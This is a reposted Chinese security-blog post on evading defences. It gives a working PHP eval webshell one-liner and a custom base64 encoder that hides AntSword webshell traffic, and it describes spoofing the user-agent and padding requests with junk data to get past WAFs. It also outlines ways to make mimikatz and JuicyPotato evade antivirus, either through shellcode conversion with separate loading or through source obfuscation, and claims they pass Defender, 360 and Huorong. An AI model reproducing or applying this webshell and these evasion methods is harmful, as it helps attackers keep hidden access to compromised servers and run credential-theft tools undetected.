工具绕防

admin 2022年6月26日22:16:09安全文章评论12 views1184字阅读3分56秒阅读模式

前言:摸鱼玩了几天是真的玩的那种笑死 啥都没学

本来说大前天就把这玩意整完的 几天就干了一点事情

其中cs的一些东西和frp改造还没玩明白 不过暂时就这样吧   内核的很多还是玩不明白 先放着吧以后在学了

摸鱼玩其他的去

工具绕防


正文:

蚁剑隐藏特征+自定义编码器

正常蚁剑的几个特征

①user-agent流量特征

工具绕防

②shellcode未加密流量特征

后面补的所有上面的useragent已经被改了

工具绕防

改造

①shellcode未加密流量特征思路

一个编码项目

https://codeload.github.com/xiaopan233/AntSword-Cryption-WebShell/zip/refs/heads/main

base64思路

工具绕防

这里以最基础的base64加密为例

新加一个编码器 然后内容如下即可

/** * php::base64编码器 * Create at: 2018/12/29 09:12:22 */
'use strict';
/** @param {String} pwd 连接密码* @param {Array} data 编码器处理前的 payload 数组* @return {Array} data 编码器处理后的 payload 数组*/module.exports = (pwd, data) => { data[pwd] = new Buffer(data['_']).toString('base64'); delete data['_']; // 返回编码器处理后的 payload 数组 return data;}

shellcode代码

<?php @eval(base64_decode($_POST['shell'])); ?>
蚁剑自带rsa加密

工具绕防

copy php代码然后正常连接即可

工具绕防

然后把shellcode扔服务器上 然后进行配置编码器设置为我们设置的那个即可

工具绕防

工具绕防

②更改user-agent

更改module文件下的  这两个文件内容即可

工具绕防

工具绕防

改成我们想伪造的即可 然后重启即可

工具绕防

③其余自选功能

加点垃圾数据和分块这些去过一些垃圾waf

这样一来神仙都难说是

工具绕防

工具绕防

这个去配置urlblacklist 把要过滤的删了改了即可

工具绕防




猕猴桃免杀

这里只分享思路 不放东西

将猕猴桃的exe做个简单免杀然后exe转shellcode 然后就变成我们常规使用的分离加载以及编码加解密shellcode免杀的思路了

工具绕防


有人说猕猴桃走源码免杀

不是说不可以 但是咋说呢 耗时间 特征定位耗费一堆时间哪怕用myccl去做特征定位 我也觉得蛮耗时间的 而且特征这块火绒杀的蛮死的 对我来说能转换为其他思路做就绝不用这种

工具绕防

没开启样本上传的360倒是可以不杀

工具绕防



juicepotao免杀

这种其实也可以转shellcode然后走分离 但是考虑到具体版本clsid不灵活的特点

我这里没想出其他的多好的思路,还是走的源码免杀 就是常规的替换参数替换资源混淆代码执行逻辑

效果如下

wdf+360+火绒全过

工具绕防


原文始发于微信公众号(goddemon的小屋):工具绕防

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月26日22:16:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  工具绕防 http://cn-sec.com/archives/1145546.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: